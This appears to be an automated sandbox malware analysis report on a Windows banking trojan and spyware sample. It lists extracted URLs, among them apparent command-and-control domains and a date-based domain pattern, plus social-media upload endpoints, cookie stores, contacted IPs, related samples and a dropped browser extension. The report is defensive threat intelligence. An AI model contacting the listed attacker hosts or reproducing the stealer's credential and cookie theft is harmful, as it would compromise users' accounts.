      https://duckduckgo.com/ac/?q=56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drfalse
        		high
        https://www.messenger.com/56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
          		high
          http://www.msn.comecvFEAD.tmp.9.drfalse
            		high
            http://www.nirsoft.net1611970637183.exe, 00000009.00000002.384711842.0000000000198000.00000004.00000010.sdmpfalse
              		high
              https://deff.nelreports.net/api/report?cat=msnecvFEAD.tmp.9.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://A5D4CE54CC78B3CA.xyz/56BB1610C0318054.exe, 00000002.00000003.409442821.0000000003810000.00000004.00000040.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://contextual.media.net/__media__/js/util/nrrV9140.jsecvFEAD.tmp.9.drfalse
                		high
                https://twitter.com/ookie:56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                  		high
                  https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.jsecvFEAD.tmp.9.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://twitter.comsec-fetch-dest:56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2ZecvFEAD.tmp.9.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0fecvFEAD.tmp.9.drfalse
                    		high
                    http://charlesproxy.com/sslCyfj6XGbkd.exe, 00000000.00000002.365655774.000000000089B000.00000004.00000020.sdmpfalse
                      		high
                      http://ocsp.pki.goog/gts1o1core0ecvFEAD.tmp.9.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.msn.com/?ocid=iehpecvFEAD.tmp.9.drfalse
                        		high
                        https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3ecvFEAD.tmp.9.drfalse
                          		high
                          http://crl.pki.goog/GTS1O1core.crl0ecvFEAD.tmp.9.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://www.messenger.com56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                            		high
                            https://cvision.media.net/new/300x300/2/189/9/46/83cfba42-7d45-4670-a4a7-a3211ca07534.jpg?v=9ecvFEAD.tmp.9.drfalse
                              		high
                              http://www.nirsoft.net/1611970637183.exe, 1611970637183.exe.2.drfalse
                                		high
                                http://84CFBA021A5A6662.xyz/al56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://forms.real.com/real/realone/download.html?type=rpsp_us56BB1610C0318054.exe, 00000002.00000003.390655999.0000000003813000.00000004.00000001.sdmpfalse
                                  		high
                                  https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%ecvFEAD.tmp.9.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://ocsp.pki.goog/GTSGIAG30ecvFEAD.tmp.9.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%256BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                    		high
                                    http://84CFBA021A5A6662.xyz/llr56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4NecvFEAD.tmp.9.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://84CFBA021A5A6662.xyz/56BB1610C0318054.exe, 00000004.00000003.376116050.0000000003D41000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                      		high
                                      https://www.instagram.com/56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                        		high
                                        http://84CFBA021A5A6662.xyz/llHCyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/soap/encoding/download_user.dll.2.drfalse
                                          		high
                                          http://www.xunlei.com/GETdownload_user.dll.2.drfalse
                                            		high
                                            http://www.youtube.comT56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eeeecvFEAD.tmp.9.drfalse
                                              		high
                                              http://www.vb-cable.comVBCABLECyfj6XGbkd.exefalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.cecvFEAD.tmp.9.drfalse
                                                		high
                                                https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://www.messenger.com/origin:56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=56BB1610C0318054.exe, 00000002.00000003.390709942.0000000000838000.00000004.00000001.sdmp, Localwebdata1611970646229.2.drfalse
                                                      		high
                                                      http://pki.goog/gsr2/GTS1O1.crt0ecvFEAD.tmp.9.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1ecvFEAD.tmp.9.drfalse
                                                        		high
                                                        https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xmlecvFEAD.tmp.9.drfalse
                                                          		high
                                                          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gecvFEAD.tmp.9.drfalse
                                                            		high
                                                            https://contextual.media.net/ecvFEAD.tmp.9.drfalse
                                                              		high
                                                              http://ocsp.pki.goog/gsr202ecvFEAD.tmp.9.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.youtube.comf56BB1610C0318054.exe, 00000004.00000003.375790359.0000000003D42000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookieecvFEAD.tmp.9.drfalse
                                                                		high
                                                                https://pki.goog/repository/0ecvFEAD.tmp.9.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1ecvFEAD.tmp.9.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://api.twitter.com/1.1/statuses/update.json56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://srtb.msn.com/auction?a=de-ch&b=fa1a6a09db4c4f6fbf480b78c51caf60&c=MSN&d=http%3A%2F%2Fwww.msnecvFEAD.tmp.9.drfalse
                                                                    		high
                                                                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736ecvFEAD.tmp.9.drfalse
                                                                      		high
                                                                      https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9ecvFEAD.tmp.9.drfalse
                                                                        		high
                                                                        http://www.msn.com/ecvFEAD.tmp.9.drfalse
                                                                          		high
                                                                          https://upload.twitter.com/i/media/upload.json56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://www.cloudflare.com/5xx-error-landingCyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000003.371026243.0000000003813000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.376084985.0000000003D38000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734ecvFEAD.tmp.9.drfalse
                                                                                		high
                                                                                http://84CFBA021A5A6662.xyz/info_old/r56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmpfalse
                                                                                  		unknown
                                                                                  https://twitter.com/compose/tweetsec-fetch-mode:56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://84CFBA021A5A6662.xyz/info_old/wCyfj6XGbkd.exe, 00000000.00000002.365614828.0000000000861000.00000004.00000020.sdmp, Cyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000003.409330449.0000000003D76000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.376093286.0000000003D4D000.00000004.00000001.sdmpfalse
                                                                                      		unknown
                                                                                      http://www.vb-cable.comCyfj6XGbkd.exefalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://www.messenger.com/accept:56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804ecvFEAD.tmp.9.drfalse
                                                                                          		high
                                                                                          https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3ecvFEAD.tmp.9.drfalse
                                                                                            		high
                                                                                            https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.jsecvFEAD.tmp.9.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://contextual.media.net/48/nrrV18753.jsecvFEAD.tmp.9.drfalse
                                                                                              		high
                                                                                              https://cvision.media.net/new/286x175/2/189/134/171/257b11a9-f3a3-4bb3-9298-c791f456f3d0.jpg?v=9ecvFEAD.tmp.9.drfalse
                                                                                                		high
                                                                                                http://84CFBA021A5A6662.xyz/info_old/e56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://crl.pki.goog/gsr2/gsr2.crl0?ecvFEAD.tmp.9.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://84CFBA021A5A6662.xyz/info_old/g56BB1610C0318054.exe, 00000002.00000003.391014906.0000000003D78000.00000004.00000001.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://pki.goog/gsr2/GTSGIAG3.crt0)ecvFEAD.tmp.9.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=056BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://feedback.googleusercontent.com56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.xunlei.com/download_user.dll.2.drfalse
                                                                                                          		high
                                                                                                          http://pki.goog/gsr2/GTS1O1.crt0#ecvFEAD.tmp.9.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://84CFBA021A5A6662.xyz/info_old/wV56BB1610C0318054.exe, 00000004.00000002.377383414.00000000005A6000.00000004.00000020.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/soap/envelope/download_user.dll.2.drfalse
                                                                                                              		high
                                                                                                              https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		low
                                                                                                              https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationecvFEAD.tmp.9.drfalse
                                                                                                                		high
                                                                                                                http://84cfba021a5a6662.xyz/info_old/wICyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://84cfba021a5a6662.xyz/Cyfj6XGbkd.exe, 00000000.00000002.365626550.000000000086D000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000003.370858416.00000000007E4000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.377399096.00000000005BB000.00000004.00000020.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsecvFEAD.tmp.9.drfalse
                                                                                                                    		high
                                                                                                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbfecvFEAD.tmp.9.drfalse
                                                                                                                      		high
                                                                                                                      http://84CFBA021A5A6662.xyz/f56BB1610C0318054.exe, 00000004.00000003.376116050.0000000003D41000.00000004.00000001.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://curl.haxx.se/docs/http-cookies.html56BB1610C0318054.exe, 00000002.00000002.414835494.000000000344F000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380176244.000000000330F000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.openssl.org/support/faq.htmldownload_user.dll.2.drfalse
                                                                                                                          		high
                                                                                                                          http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tLecvFEAD.tmp.9.drfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629ecvFEAD.tmp.9.drfalse
                                                                                                                            		high
                                                                                                                            https://www.instagram.comsec-fetch-mode:56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://www.instagram.com/accounts/login/ajax/facebook/56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpfalse
                                                                                                                              		high

                                                                                                                              Contacted IPs

                                                                                                                              • No. of IPs < 25%
                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                              • 75% < No. of IPs

                                                                                                                              Public

                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                              104.21.23.16
                                                                                                                              		unknownUnited States
                                                                                                                              		13335CLOUDFLARENETUSfalse

                                                                                                                              Private

                                                                                                                              IP
                                                                                                                              192.168.2.1
                                                                                                                              127.0.0.1

                                                                                                                              General Information

                                                                                                                              Joe Sandbox Version:31.0.0 Emerald
                                                                                                                              Analysis ID:346134
                                                                                                                              Start date:29.01.2021
                                                                                                                              Start time:17:35:36
                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                              Overall analysis duration:0h 12m 11s
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:full
                                                                                                                              Sample file name:Cyfj6XGbkd (renamed file extension from none to exe)
                                                                                                                              Cookbook file name:default.jbs
                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                              Number of analysed new started processes analysed:36
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:0
                                                                                                                              Technologies:
                                                                                                                              • HCA enabled
                                                                                                                              • EGA enabled
                                                                                                                              • HDC enabled
                                                                                                                              • AMSI enabled
                                                                                                                              Analysis Mode:default
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal93.bank.troj.spyw.evad.winEXE@32/37@4/3
                                                                                                                              EGA Information:Failed
                                                                                                                              HDC Information:
                                                                                                                              • Successful, ratio: 60.1% (good quality ratio 57.2%)
                                                                                                                              • Quality average: 80.5%
                                                                                                                              • Quality standard deviation: 27.1%
                                                                                                                              HCA Information:
                                                                                                                              • Successful, ratio: 68%
                                                                                                                              • Number of executed functions: 117
                                                                                                                              • Number of non-executed functions: 225
                                                                                                                              Cookbook Comments:
                                                                                                                              • Adjust boot time
                                                                                                                              • Enable AMSI
                                                                                                                              Warnings:
                                                                                                                              Show All
                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                              • Excluded IPs from analysis (whitelisted): 168.61.161.212, 104.43.139.144, 51.11.168.160, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 51.103.5.186, 52.155.217.156, 20.54.26.129, 23.210.248.85, 204.79.197.200, 13.107.21.200
                                                                                                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, emea1.wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net
                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                              Simulations

                                                                                                                              Behavior and APIs

                                                                                                                              TimeTypeDescription
                                                                                                                              17:36:38API Interceptor4x Sleep call for process: Cyfj6XGbkd.exe modified
                                                                                                                              17:36:46API Interceptor4x Sleep call for process: 56BB1610C0318054.exe modified

                                                                                                                              Joe Sandbox View / Context

                                                                                                                              IPs

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                              104.21.23.16FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                              • 84CFBA021A5A6662.xyz/info_old/ddd
                                                                                                                              FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                              • 84CFBA021A5A6662.xyz/info_old/ddd

                                                                                                                              Domains

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                              84CFBA021A5A6662.xyzN1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                              • 172.67.208.74
                                                                                                                              FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.23.16
                                                                                                                              FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.23.16
                                                                                                                              84cfba021a5a6662.xyzN1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                              • 172.67.208.74
                                                                                                                              FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.23.16
                                                                                                                              FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.23.16

                                                                                                                              ASN

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                              CLOUDFLARENETUSRoyalmail-Shipment.xlsGet hashmaliciousBrowse
                                                                                                                              • 172.67.1.225
                                                                                                                              N1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                              • 172.67.208.74
                                                                                                                              Royalmail-Shipment.xlsGet hashmaliciousBrowse
                                                                                                                              • 172.67.1.225
                                                                                                                              PO#PDT28394209.exeGet hashmaliciousBrowse
                                                                                                                              • 172.67.176.199
                                                                                                                              c8TrAKsz0T.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.47.75
                                                                                                                              FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.23.16
                                                                                                                              RddH6rLRfH.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.27.240
                                                                                                                              Immuni.apkGet hashmaliciousBrowse
                                                                                                                              • 172.64.100.5
                                                                                                                              FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.23.16
                                                                                                                              UGPK60taH6.dllGet hashmaliciousBrowse
                                                                                                                              • 104.20.184.68
                                                                                                                              4PDNbYK5fj.exeGet hashmaliciousBrowse
                                                                                                                              • 172.67.169.213
                                                                                                                              pmTdQ57tvM.exeGet hashmaliciousBrowse
                                                                                                                              • 172.67.169.213
                                                                                                                              7BtV39hziI.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.27.240
                                                                                                                              dc4AaqW6Aa.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.27.240
                                                                                                                              lAy87VNPiL.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.27.240
                                                                                                                              97aa4Ywd9y.exeGet hashmaliciousBrowse
                                                                                                                              • 104.21.27.240
                                                                                                                              wuRBlQt0Tz.exeGet hashmaliciousBrowse
                                                                                                                              • 172.67.169.213
                                                                                                                              4GRuinub4a.exeGet hashmaliciousBrowse
                                                                                                                              • 172.67.169.213
                                                                                                                              v8c1m9dW8G.exeGet hashmaliciousBrowse
                                                                                                                              • 172.67.169.213
                                                                                                                              XQx9brj85p.exeGet hashmaliciousBrowse
                                                                                                                              • 172.67.169.213

                                                                                                                              JA3 Fingerprints

                                                                                                                              No context

                                                                                                                              Dropped Files

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                              C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeN1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                                FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                  FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                    C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeN1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                                      FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                        FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                          C:\Users\user\AppData\Local\Temp\MSIDCDD.tmpN1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                                            FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                              FileSetup-v17.04.41.exeGet hashmaliciousBrowse

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Cookies1611970637026
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):20480
                                                                                                                                                Entropy (8bit):0.6951152985249047
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
                                                                                                                                                MD5:EA7F9615D77815B5FFF7C15179C6C560
                                                                                                                                                SHA1:3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
                                                                                                                                                SHA-256:A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
                                                                                                                                                SHA-512:9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Cookies1611970645636
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):20480
                                                                                                                                                Entropy (8bit):0.6951152985249047
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
                                                                                                                                                MD5:EA7F9615D77815B5FFF7C15179C6C560
                                                                                                                                                SHA1:3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
                                                                                                                                                SHA-256:A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
                                                                                                                                                SHA-512:9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\background.js
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
                                                                                                                                                File Type:ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):886
                                                                                                                                                Entropy (8bit):5.022683940423506
                                                                                                                                                Encrypted:false
